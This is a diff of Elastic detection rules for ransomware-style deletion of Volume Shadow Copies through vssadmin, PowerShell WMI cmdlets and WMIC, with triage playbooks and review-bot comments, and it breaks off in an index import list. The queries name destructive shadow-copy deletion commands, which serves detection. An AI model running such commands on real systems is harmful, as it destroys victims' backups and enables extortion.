@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Volume Shadow Copy Deleted or Resized via VssAdmin", - "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and 
reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). 
If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type in (\"start\", \"process_started\")\n and (process.name : \"vssadmin.exe\" or process.pe.original_file_name == \"VSSADMIN.EXE\") and\n process.args in (\"delete\", \"resize\") and process.args : \"shadows*\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -43,5 +66,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 13
+ "version": 15
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json
index 424029ea8cb11..12bf2d02aca43 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json
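Review bot: The re-added `note` still lists this rule itself under `### Related rules` (`b5ea4bfe-a1b2-421f-9d47-22a75a6f2921` is this file's own `rule_id`) and omits the WMIC sibling, so the cross-reference sends the analyst back to the alert they are already triaging; replacing that entry with `- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57` would make the section useful. The PowerShell rule's note in the next file has the same self-reference (`d99a037b-c8e2-47a5-97b9-170d076827c4`) and the same omission. On the unchanged `query` line, `process.args in ("delete", "resize")` is a case-sensitive comparison in EQL while the neighbouring `process.name :` match is not; if mixed-case invocations are meant to be covered, `in~` would be the consistent choice, though that is outside what this commit changes.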
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_powershell.json 
@@ -13,15 +13,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Volume Shadow Copy Deletion via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow\ncopy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False 
positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and \n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via PowerShell\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow\ncopy objects, and delete them.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account 
owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). 
If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : (\"*Get-WmiObject*\", \"*gwmi*\", \"*Get-CimInstance*\", \"*gcim*\") and\n process.args : (\"*Win32_ShadowCopy*\") and\n process.args : (\"*.Delete()*\", \"*Remove-WmiObject*\", \"*rwmi*\", \"*Remove-CimInstance*\", \"*rcim*\")\n",
 "references": [
 "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy",
 "https://powershell.one/wmi/root/cimv2/win32_shadowcopy",
 "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "d99a037b-c8e2-47a5-97b9-170d076827c4",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -49,5 +67,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json
index a61de760359db..ed80743537b43 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_via_wmic.json
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Volume Shadow Copy Deletion via WMIC", - "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on 
the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deletion via WMIC\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes\nthat can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow\nCopies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow\ncopies worth monitoring.\n\nThis rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter.\n\n#### Possible investigation steps\n\n- Investigate the program execution chain (parent process tree).\n- Check whether the account is authorized to perform this operation.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and 
collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your\nenvironment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data 
recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"WMIC.exe\" or process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"delete\" and process.args : \"shadowcopy\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -43,5 +66,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 12
+ "version": 14
 }
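Review bot: The re-added `note` keeps the investigation step "In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.", but this rule's `query` only matches `process.args : "delete"`, so no alert from it can involve a resize; the step was evidently carried over from the VssAdmin playbook and should be dropped here so analysts are not sent looking for a condition the rule cannot produce. The `required_fields` entries themselves line up with every field the query references.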
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts
index a02e40e55dbeb..20dd6b52d1f67 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/index.ts
@@ -31,658 +31,665 @@ import rule18 from './apm_403_response_to_a_post.json'; import rule19 from './apm_405_response_method_not_allowed.json'; import rule20 from './apm_null_user_agent.json'; import rule21 from './apm_sqlmap_user_agent.json'; -import rule22 from './command_and_control_dns_directly_to_the_internet.json'; +import rule22 from './command_and_control_linux_iodine_activity.json'; import rule23 from './command_and_control_nat_traversal_port_activity.json'; import rule24 from './command_and_control_port_26_activity.json'; import rule25 from './command_and_control_rdp_remote_desktop_protocol_from_the_internet.json'; import rule26 from './command_and_control_telnet_port_activity.json'; import rule27 from './command_and_control_vnc_virtual_network_computing_from_the_internet.json'; import rule28 from './command_and_control_vnc_virtual_network_computing_to_the_internet.json'; -import rule29 from './defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json'; -import rule30 from './defense_evasion_clearing_windows_event_logs.json'; -import rule31 from './defense_evasion_delete_volume_usn_journal_with_fsutil.json'; -import rule32 from './defense_evasion_disable_windows_firewall_rules_with_netsh.json'; -import rule33 from './defense_evasion_misc_lolbin_connecting_to_the_internet.json'; -import rule34 from './defense_evasion_msbuild_making_network_connections.json'; -import rule35 from './defense_evasion_suspicious_certutil_commands.json'; -import rule36 from './defense_evasion_unusual_network_connection_via_rundll32.json'; -import rule37 from './defense_evasion_unusual_process_network_connection.json'; -import rule38 from './defense_evasion_via_filter_manager.json'; -import rule39 from './discovery_linux_hping_activity.json'; -import rule40 from './discovery_whoami_command_activity.json'; -import rule41 from './endgame_adversary_behavior_detected.json'; -import rule42 from './endgame_cred_dumping_detected.json'; -import rule43 from 
'./endgame_cred_dumping_prevented.json'; -import rule44 from './endgame_cred_manipulation_detected.json'; -import rule45 from './endgame_cred_manipulation_prevented.json'; -import rule46 from './endgame_exploit_detected.json'; -import rule47 from './endgame_exploit_prevented.json'; -import rule48 from './endgame_malware_detected.json'; -import rule49 from './endgame_malware_prevented.json'; -import rule50 from './endgame_permission_theft_detected.json'; -import rule51 from './endgame_permission_theft_prevented.json'; -import rule52 from './endgame_process_injection_detected.json'; -import rule53 from './endgame_process_injection_prevented.json'; -import rule54 from './endgame_ransomware_detected.json'; -import rule55 from './endgame_ransomware_prevented.json'; -import rule56 from './execution_command_prompt_connecting_to_the_internet.json'; -import rule57 from './execution_command_shell_started_by_svchost.json'; -import rule58 from './execution_html_help_executable_program_connecting_to_the_internet.json'; -import rule59 from './execution_psexec_lateral_movement_command.json'; -import rule60 from './execution_register_server_program_connecting_to_the_internet.json'; -import rule61 from './execution_via_compiled_html_file.json'; -import rule62 from './impact_deleting_backup_catalogs_with_wbadmin.json'; -import rule63 from './impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json'; -import rule64 from './impact_volume_shadow_copy_deletion_via_wmic.json'; -import rule65 from './initial_access_rpc_remote_procedure_call_from_the_internet.json'; -import rule66 from './initial_access_rpc_remote_procedure_call_to_the_internet.json'; -import rule67 from './initial_access_script_executing_powershell.json'; -import rule68 from './initial_access_smb_windows_file_sharing_activity_to_the_internet.json'; -import rule69 from './initial_access_suspicious_ms_office_child_process.json'; -import rule70 from './initial_access_suspicious_ms_outlook_child_process.json'; -import 
rule71 from './lateral_movement_direct_outbound_smb_connection.json'; -import rule72 from './lateral_movement_service_control_spawned_script_int.json'; -import rule73 from './linux_iodine_activity.json'; -import rule74 from './linux_netcat_network_connection.json'; -import rule75 from './linux_nping_activity.json'; -import rule76 from './linux_process_started_in_temp_directory.json'; -import rule77 from './persistence_adobe_hijack_persistence.json'; -import rule78 from './persistence_local_scheduled_task_creation.json'; -import rule79 from './persistence_priv_escalation_via_accessibility_features.json'; -import rule80 from './persistence_shell_activity_by_web_server.json'; -import rule81 from './persistence_system_shells_via_services.json'; -import rule82 from './persistence_user_account_creation.json'; -import rule83 from './persistence_via_application_shimming.json'; -import rule84 from './privilege_escalation_linux_strace_activity.json'; -import rule85 from './privilege_escalation_unusual_parentchild_relationship.json'; -import rule86 from './impact_modification_of_boot_config.json'; -import rule87 from './privilege_escalation_uac_bypass_event_viewer.json'; -import rule88 from './defense_evasion_msxsl_network.json'; -import rule89 from './discovery_command_system_account.json'; -import rule90 from './command_and_control_certutil_network_connection.json'; -import rule91 from './defense_evasion_cve_2020_0601.json'; -import rule92 from './credential_access_credential_dumping_msbuild.json'; -import rule93 from './defense_evasion_execution_msbuild_started_by_office_app.json'; -import rule94 from './defense_evasion_execution_msbuild_started_by_script.json'; -import rule95 from './defense_evasion_execution_msbuild_started_by_system_process.json'; -import rule96 from './defense_evasion_execution_msbuild_started_renamed.json'; -import rule97 from './defense_evasion_execution_msbuild_started_unusal_process.json'; -import rule98 from 
